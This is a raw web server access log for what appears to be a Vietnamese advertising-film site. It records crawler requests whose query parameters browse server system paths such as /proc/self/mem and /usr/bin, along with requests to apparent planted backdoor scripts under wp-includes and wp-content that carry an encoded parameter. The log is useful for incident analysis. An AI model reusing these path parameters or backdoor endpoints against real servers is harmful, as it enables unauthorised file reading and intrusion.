74.7.227.189 - - [09/Nov/2025:01:00:00 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory12/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:01 +0000] "GET /41fmzrl24259.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/firmware_node/subsystem/drivers/ec HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:02 +0000] "GET /73wnrud41651.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:10 +0000] "GET /149rggqa4255.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/ac HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.235.191.179 - - [09/Nov/2025:01:00:12 +0000] "GET /our-works/tvc-calci/?fileloc=//proc/self/mem&path=//proc/self HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:57:50 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333436392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393836392q3265323933363131373035646537363238636161653537306336643161303333222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
204.12.208.18 - - [09/Nov/2025:01:00:12 +0000] "GET /wp-includes/addc3d4c/edit.php HTTP/1.0" 200 172 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
216.73.216.50 - - [09/Nov/2025:01:00:14 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fsys%2Fkernel%2Fslab%2Fmm_struct%2Fcgroup%2Fmm_struct%28877%3Afastpanel2-nginx.service%29%2Faliases&path=%2F%2Fproc%2F3264%2Froot%2Fsys%2Fkernel%2Fslab%2Fmm_struct%2Fcgroup%2Fmm_struct%28877%3Afastpanel2-nginx.service%29 HTTP/1.0" 200 2918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.87.95.7 - - [09/Nov/2025:01:00:16 +0000] "GET /our-works/tvc-jokky/?fileloc=//sys/kernel/fscaps&path=//sys/kernel HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:16 +0000] "GET /23iiaxd33653.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/ec HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:01:00:17 +0000] "GET / HTTP/1.0" 200 4760 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
23.21.227.240 - - [09/Nov/2025:01:00:18 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//proc/2/arch_status&path=//proc/2 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
40.77.167.0 - - [09/Nov/2025:01:00:18 +0000] "GET /?products=1612765328 HTTP/1.0" 200 26272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:00:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fapport%2Fuser_group.py&path=%2F%2Fproc%2F3264%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fapport HTTP/1.0" 200 3242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.194.165.45 - - [09/Nov/2025:01:00:24 +0000] "GET /our-works/tvc-relax-gaba/?fileloc=//lib/udev/fido_id&path=//lib/udev HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.167.144.218 - - [09/Nov/2025:01:00:24 +0000] "GET /?products=614828554 HTTP/1.0" 200 25589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:25 +0000] "GET /104jdrww1044.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.235.239.240 - - [09/Nov/2025:01:00:30 +0000] "GET /our-works/tvc-relax-gaba/?fileloc=//lib/udev/fido_id&path=//lib/udev HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:58:13 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333439332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393839332q6439386538646531363538393931653161386138633532316136366463616235222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
44.206.65.8 - - [09/Nov/2025:01:00:35 +0000] "GET /our-works/tvc-kimino/?fileloc=//usr/bin/systemd-cgtop&path=//usr/bin HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:35 +0000] "GET /248rihzw5804.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.20.224.184 - - [09/Nov/2025:01:00:36 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//sys/bus/cec HTTP/1.0" 200 3336 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:00:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/ac HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:00:36 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Fsound%2Fi2c%2Fother HTTP/1.0" 200 3198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.0 - - [09/Nov/2025:01:00:37 +0000] "GET /?products=625772650 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
44.216.172.204 - - [09/Nov/2025:01:00:37 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/module/block HTTP/1.0" 200 3235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [09/Nov/2025:00:58:39 +0000] "GET /wp-includes/addc3d4c/edit.php?id=401440 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=401440" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.51 - - [09/Nov/2025:01:00:39 +0000] "GET /70jdntw12168.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.94.157.25 - - [09/Nov/2025:01:00:39 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/pager&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:40 +0000] "GET /149fofbc1941.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.70.100 - - [09/Nov/2025:01:00:40 +0000] "GET /our-works/tvc-calci/?fileloc=//lib/git-core/git-rev-list&path=//lib/git-core HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:00:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:41 +0000] "GET /79bjram24395.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:42 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/button/bind&path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:43 +0000] "GET /18uvnta43320.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:44 +0000] "GET /95qdvlj40065.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:00:44 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3.8%2F__pycache__%2Fturtle.cpython-38.pyc&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3.8%2F__pycache__ HTTP/1.0" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.209.174.110 - - [09/Nov/2025:01:00:47 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/git-core/git-diff-files&path=//lib/git-core HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:47 +0000] "GET /229wvzxd9555.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/ec HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.205.127.11 - - [09/Nov/2025:01:00:50 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/pager&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:00:51 +0000] "GET /22nshdd31828.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:00:54 +0000] "GET /75euaxg11885.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.203.111.15 - - [09/Nov/2025:01:00:55 +0000] "GET /our-works/corporate/marina-plaza/?fileloc=//bin/unsquashfs&path=//bin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:58:35 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333531352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393931352q6461623663386231653136343139343835666565653938326563363564396331222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:01:00:58 +0000] "GET /42eigrl19922.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:00:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/ac HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.199.17 - - [09/Nov/2025:01:00:59 +0000] "GET /our-works/tvc-calci/?fileloc=//lib/git-core/git-rev-list&path=//lib/git-core HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:01 +0000] "GET /206sivwc4026.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.124.6 - - [09/Nov/2025:01:01:02 +0000] "GET /our-works/corporate/marina-plaza/?fileloc=//bin/realpath&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:06 +0000] "GET /84tpoet14268.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.240.226 - - [09/Nov/2025:01:01:09 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/iconv&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:10 +0000] "GET /206htfbl9774.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.234.197.175 - - [09/Nov/2025:01:01:11 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/iconv&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory12/node0/cpu1/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:13 +0000] "GET /55qryxw42643.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.169.102.85 - - [09/Nov/2025:01:01:13 +0000] "GET /our-works/tvc-kimino/?fileloc=//bin/python3.8&path=//bin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/ec HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:16 +0000] "GET /60mwpgm37392.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.208.156.9 - - [09/Nov/2025:01:01:17 +0000] "GET /our-works/phim-viral-ila/?fileloc=//bin/ckbcomp&path=//bin HTTP/1.0" 200 33972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:58:58 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333533382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393933382q3565313363356265346566363133623765306237363737323061343065373734222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:01:01:19 +0000] "GET /86hhwcj49872.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.4.213.199 - - [09/Nov/2025:01:01:20 +0000] "GET /our-works/tvc-jokky/?fileloc=//proc/self/syscall&path=//proc/self HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:21 +0000] "GET /258wvbmk6684.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:22 +0000] "GET /254rjswp8426.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:23 +0000] "GET /48cvfol27822.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.143.51 - - [09/Nov/2025:01:01:24 +0000] "GET /q-~68wBbjRbIfJReiHF6el7IzVK2cMwr1YZ9743/ HTTP/1.0" 200 4759 "https://lamphimquangcao.net/sitemap170.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.50 - - [09/Nov/2025:01:01:25 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Flib%2Fmath%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Flib%2Fmath HTTP/1.0" 200 3047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.91.122.193 - - [09/Nov/2025:01:01:26 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//lib/eject HTTP/1.0" 200 3161 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
